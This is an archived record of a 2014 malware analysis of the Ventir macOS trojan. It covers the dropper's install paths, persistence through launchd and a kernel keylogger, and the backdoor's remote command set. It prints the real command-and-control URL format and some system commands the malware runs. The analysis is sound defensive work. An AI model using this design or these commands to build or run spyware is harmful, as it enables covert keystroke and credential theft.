{
	"id": "00e69c8f-d273-4588-a0bf-a9bbf87da7c8",
	"created_at": "2026-04-06T00:21:41.509428Z",
	"updated_at": "2026-04-10T03:20:22.333052Z",
	"deleted_at": null,
	"sha1_hash": "041b06c36f8ce4ec2656b8d3bb399fe6a88d9575",
	"title": "The Ventir Trojan: assemble your MacOS spy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 231882,
	"plain_text": "The Ventir Trojan: assemble your MacOS spy\r\nBy Mikhail Kuzin\r\nPublished: 2014-10-16 · Archived: 2026-04-05 18:34:37 UTC\r\nWe got an interesting file (MD5 9283c61f8cce4258c8111aaf098d21ee) for analysis a short while ago. It turned out to be a sample of modular malware for MacOS X. Even after preliminary analysis it was clear that the file was not designed for any good purpose: an ordinary 64-bit mach-o executable contained several more mach-o files in its data section; it set one of them to autorun, which is typical of Trojan-Droppers.\r\nFurther investigation showed that a backdoor, a keylogger and a Trojan-Spy were hidden inside the sample. It is particularly noteworthy that the keylogger uses an open-source kernel extension. The extension’s code is publicly available, for example, on GitHub!\r\nDepending on their purpose, these files are detected by Kaspersky Lab antivirus solutions as Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a and not-a-virus:Monitor.OSX.LogKext.c.\r\nSource file (Trojan-Dropper.OSX.Ventir.a)\r\nAs soon as it is launched, the dropper checks whether it has root access by calling the geteuid() function. The result of the check determines where the Trojan’s files will be installed:\r\nIf it has root access, the files will be installed in /Library/.local and /Library/LaunchDaemons;\r\nIf it does not have root access, the files will be installed in ~/Library/.local and ~/Library/LaunchAgents (“~” stands for the path to the current user’s home directory).\r\nAll files of the Trojan to be downloaded to the victim machine are initially located in the “__data” section of the dropper file.\r\nLocation of the Trojan’s files inside the dropper\r\nAs a result, the following files will be installed on the infected system:\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 1 of 5\r\n1. Library/.local/updated – re-launches the files update and EventMonitor in the event of unexpected termination.\r\n2. Library/.local/reweb – used to re-launch the file updated.\r\n3. Library/.local/update – the backdoor module.\r\n4. Library/.local/libweb.db – the malicious program’s database file. Initially contains the Trojan’s global settings, such as the C\u0026C address.\r\n5. Library/LaunchAgents (or LaunchDaemons)/com.updated.launchagent.plist – the properties file used to set the file Library/.local/updated to autorun using the launchd daemon.\r\n6. Depending on whether root access is available:\r\nA) if it is – /Library/.local/kext.tar. The following files are extracted from the archive:\r\nupdated.kext – the driver that intercepts user keystrokes;\r\nKeymap.plist – the map which matches the codes of the keys pressed by the user to the characters associated with these codes;\r\nEventMonitor – the agent which logs keystrokes as well as certain system events to the following file: Library/.local/.logfile.\r\nB) if it isn’t – ~/Library/.local/EventMonitor. This is the agent that logs the current active window name and the keystrokes to the following file: Library/.local/.logfile.\r\nAfter installing these files, the Trojan sets the file updated to autorun using launchctl – the standard console utility (launchctl load %s/com.updated.launchagent.plist command).\r\nNext, if root access is available, the dropper loads the logging driver into the kernel using the standard OS X utility kextload (kextload /System/Library/Extensions/updated.kext command).\r\nAfter that, Trojan-Dropper.OSX.Ventir.a launches the file reweb and removes itself from the system.\r\nUpdated and reweb files\r\nThe file updated terminates all processes with the name reweb (killall -9 reweb command). After that, it regularly checks whether the processes EventMonitor and update are running and restarts them if necessary.\r\nThe file reweb terminates all processes with the names updated and update and then runs the file Library/.local/updated.\r\nUpdate (Backdoor.OSX.Ventir.a) file\r\nThe backdoor first allocates the field values from the config table of the libweb.db database to local variables for further use.\r\nTo receive commands from C\u0026C, the malware uses an HTTP GET request in the following format: http://220.175.13.250:82/macsql.php?mode=getcmd\u0026key=1000\u0026udid=000C29174BA0, where key is some key stored in libweb.db in the config table; udid is the MAC address and 220.175.13.250:82 is the IP address and port of the C\u0026C server.\r\nThis request is sent regularly at short intervals in an infinite loop.\r\nThe backdoor can process the following commands from C\u0026C:\r\nreboot – restart the computer;\r\nrestart – restart the backdoor by launching the reweb file;\r\nuninstall – completely remove the backdoor from the system;\r\nshow config – send data from the config table to the C\u0026C server;\r\ndown exec – update the file update by downloading it from the C\u0026C server;\r\ndown config – update the configuration file libweb.db by downloading it from the C\u0026C server;\r\nupload config – send the file libweb.db to the C\u0026C server;\r\nupdate config:[parameters] – update the config table in the libweb.db database file; values of fields from the table are sent as parameters;\r\nexecuteCMD:[parameter] – execute the command specified in the parameter using the function popen(cmd, “r”); send the command’s output to the C\u0026C server;\r\nexecuteSYS:[parameter] – execute the command specified in the parameter using the function system(cmd);\r\nexecutePATH:[parameter] – run a file from the Library/.local/ directory; the file name is sent in the parameter;\r\nuploadfrompath:[parameter] – upload the file with the name specified in the parameter from the Library/.local/ directory to the C\u0026C server;\r\ndownfile:[parameters] – download the file with the name specified in a parameter from the C\u0026C server and save it to the path specified in another parameter.\r\nSome of the commands processed by the backdoor module\r\nEventMonitor (Trojan-Spy.OSX.Ventir.a) file\r\nThis file is downloaded to the system if the dropper cannot get root access. Once launched, Trojan-Spy.OSX.Ventir.a installs its own system event handler using Carbon Event Manager API functions. The new handler intercepts all keystroke events and logs them to the file ~/Library/.local/.logfile. Modifier buttons (e.g., shift) are logged as follows: [command], [option], [ctrl], [fn], [ESC], [tab], [backspace], etc.\r\nKeyboard event handler\r\nImmediately before processing a keystroke, the malware determines the name of the process whose window is currently active. To do this, it uses the GetFrontProcess and CopyProcessName functions from the Carbon API. The name of the process is also logged as [Application {process_name} is the frontwindow]. This enables the Trojan’s owner to determine in which application the logged phrase was entered.\r\nkext.tar (not-a-virus:Monitor.OSX.LogKext.c) file\r\nAs mentioned above, the kext.tar archive is downloaded to the infected computer if Trojan-Dropper.OSX.Ventir has successfully got root access. The archive contains three files:\r\nupdated.kext\r\nEventMonitor\r\nKeymap.plist\r\nThe updated.kext software package is an open-source kernel extension (kext) designed to intercept keystrokes. This extension has long been detected by Kaspersky Lab products as not-a-virus:Monitor.OSX.LogKext.c and the source code (as mentioned earlier) is currently available to the general public.\r\nThe file Keymap.plist is a map which matches the codes of keys pressed to their values. The file EventMonitor uses it to determine key values based on the codes provided to it by the file updated.kext.\r\nThe file EventMonitor is an agent file that receives data from the updated.kext kernel extension, processes it and records it in the /Library/.local/.logfile log file. Below is a fragment of the log that contains a login and password intercepted by the Trojan.\r\nAs the screenshot demonstrates, as soon as a victim enters the username and password to his or her email account on yandex.ru, the data is immediately logged and falls into the cybercriminals’ hands.\r\nThis threat is especially significant in view of the recent leaks of login and password databases from Yandex, Mail.ru and Gmail. It is quite possible that malware from the Ventir family was used to supply data to the databases published by cybercriminals.\r\nIn conclusion, it should be noted that Trojan-Dropper.OSX.Ventir.a with its modular structure is similar to the infamous Trojan.OSX.Morcut (aka OSX/Crisis), which had approximately the same number of modules with similar functionality. Using open-source software makes it much easier for cybercriminals to create new malware. This means we can safely assume that the number of Trojan-Spy programs will only grow in the future.\r\nSource: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/"
	],
	"report_names": [
		"67267"
	],
	"threat_actors": [],
	"ts_created_at": 1775434901,
	"ts_updated_at": 1775791222,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.pdf",
		"text": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.txt",
		"img": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.jpg"
	}
}